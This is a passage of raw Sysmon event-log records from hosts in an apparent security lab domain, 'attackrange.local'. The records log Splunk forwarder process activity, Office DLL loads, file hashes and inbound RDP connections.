Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000063680Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:01.097{A7A01FEF-EB09-607E-720B-00000000BB01}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x800000000000000063679Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\NAMEEXT.DLL2021-04-20 14:54:01.222 11241100x800000000000000063678Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\OLKFSTUB.DLL2021-04-20 14:54:01.222 11241100x800000000000000063677Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\OWSSUPP.DLL2021-04-20 14:54:01.222 11241100x800000000000000063676Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.222{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\ucrtbase.dll2021-04-20 14:54:01.222 11241100x800000000000000063675Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.128{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\VVIEWER.DLL2021-04-20 14:54:01.128 11241100x800000000000000063674Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.128{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\atl100.dll2021-04-20 14:54:01.128 11241100x800000000000000063673Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.128{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\atl110.dll2021-04-20 14:54:01.128 11241100x800000000000000063672Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.097{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\mfc140.dll2021-04-20 14:54:01.097 11241100x800000000000000063671Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.081{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\mfc140enu.dll2021-04-20 14:54:01.081 11241100x800000000000000063670Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\msvcp100.dll2021-04-20 14:54:01.065 11241100x800000000000000063669Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\msvcp110.dll2021-04-20 14:54:01.065 11241100x800000000000000063668Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\msvcp120.dll2021-04-20 14:54:01.065 11241100x800000000000000063667Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\msvcr120.dll2021-04-20 14:54:01.065 11241100x800000000000000063666Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.050{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\vccorlib110.dll2021-04-20 14:54:01.050 11241100x800000000000000063665Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.050{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\vccorlib120.dll2021-04-20 14:54:01.050 11241100x800000000000000063664Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.019{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\SystemX86\mfc140.dll2021-04-20 14:54:01.019 11241100x800000000000000063663Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.019{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\SystemX86\mfc140enu.dll2021-04-20 14:54:01.019 11241100x800000000000000063662Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.019{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\FM20.DLL2021-04-20 14:54:01.019 11241100x800000000000000063661Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.003{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\VVIEWDWG.DLL2021-04-20 14:54:01.003 354300x800000000000000049445Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:59.651{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-63641-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049444Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:01.399{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA672E28C86ECC8DD11C6D90910ABB5A,SHA256=44BA0520FA5DF88B331D7CDDE4C272332771FAE91CE9089A87335881680A36D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049443Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:01.071{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA89C1A5D6016EE10AFC596CF778E572,SHA256=06F373B28CB5D30FCEFBBC965B45BB49D047260D4ECF3875F22BFB167B64F9A8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063769Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:02.675{A7A01FEF-EB0A-607E-730B-00000000BB01}69884380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000063768Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:02.550{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\msvcp120.dll2021-04-20 14:54:02.550 11241100x800000000000000063767Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:02.550{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\msvcr120.dll2021-04-20 14:54:02.550 11241100x800000000000000063766Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:02.534{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ucrtbase.dll2021-04-20 14:54:02.534 11241100x800000000000000063765Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:02.518{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Web Server Extensions\16\BIN\FPWEC.DLL2021-04-20 14:54:02.518 11241100x800000000000000063764Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:02.518{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\System\ole db\xmlrw.dll2021-04-20 14:54:02.518 11241100x800000000000000063763Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:02.518{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\System\ole db\xmlrwbin.dll2021-04-20 14:54:02.518 11241100x800000000000000063762Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:02.518{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\adal.dll2021-04-20 14:54:02.518 11241100x800000000000000063761Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:02.518{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Web Server Extensions\16\BIN\FPSRVUTL.DLL2021-04-20 14:54:02.518 23542300x800000000000000063760Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:02.503{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3969058BD3315EC96D8C33064E1043EA,SHA256=10A6923E69C78D3F386F5A11735EB7AFECCA953AE9FEE248F2C2662F615244E9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063759Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:02.503{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EB0A-607E-730B-00000000BB01}6988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063758Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:02.503{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063757Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:02.503{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063756Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:02.503{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063755Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:02.503{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063754Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:02.503{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EB0A-607E-730B-00000000BB01}6988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000063753Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:02.503{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EB0A-607E-730B-00000000BB01}6988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000063752Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:02.363{A7A01FEF-EB0A-607E-730B-00000000BB01}6988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x800000000000000063751Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:02.175{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\msolap.dll2021-04-20 14:54:02.175 11241100x800000000000000063750Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:02.097{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\xmsrv.dll2021-04-20 14:54:02.034 11241100x800000000000000063749Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:02.034{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\adal.dll2021-04-20 14:54:02.034 354300x800000000000000049448Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:01.078{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62170-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049447Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:02.587{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8F1F19FF469A735A5752779B687B2BE,SHA256=AF4EFEBF02CC9AFB4079BFD822D5D8893A66798B4929E14B3BE191302060AC2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049446Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:02.103{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A42CD22D71FE865DB623D95E9D1D797B,SHA256=15D19B6BD9CAB5CC1991080CB1C753A7C3AADBE5D40EACC8FF73977DF2948D39,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063849Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:03.987{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EB0B-607E-750B-00000000BB01}6488C:\Program 